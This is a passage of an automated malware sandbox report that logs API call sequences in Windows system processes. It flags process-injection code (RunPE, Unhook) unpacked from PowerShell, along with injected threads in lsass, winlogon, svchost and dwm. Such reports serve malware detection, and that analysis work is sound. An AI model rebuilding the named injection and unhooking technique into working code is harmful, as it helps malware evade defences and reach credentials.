Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0000022123C5CD80
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0000022123C584B0
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0000022123C58814
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000013F08E6CD80
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000013F08E68814
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000013F08E684B0
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000013F08E9CD80
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000013F08E98814
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000013F08E984B0
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_000001FD186D8814
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000001FD186D84B0
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000001FD186DCD80
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000017C6DABCD80
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DAB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000017C6DAB84B0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DAB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_0000017C6DAB8814
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000017C6DD7CD80
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000017C6DD784B0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_0000017C6DD78814
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000202C0AECD80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000202C0B184B0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000202C0B18814
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000202C0B1CD80
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_000002A661308814
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002BAAEDFCD80
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDF8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000002BAAEDF8814
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDF84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002BAAEDF84B0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_0000027053068814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_0000027053068814
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002705306CD80
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_00000270530684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000270530684B0

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7faed0000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7f2866f10.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,37_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 870000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AEDC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AED92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B3A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B372EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ECD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD25AC
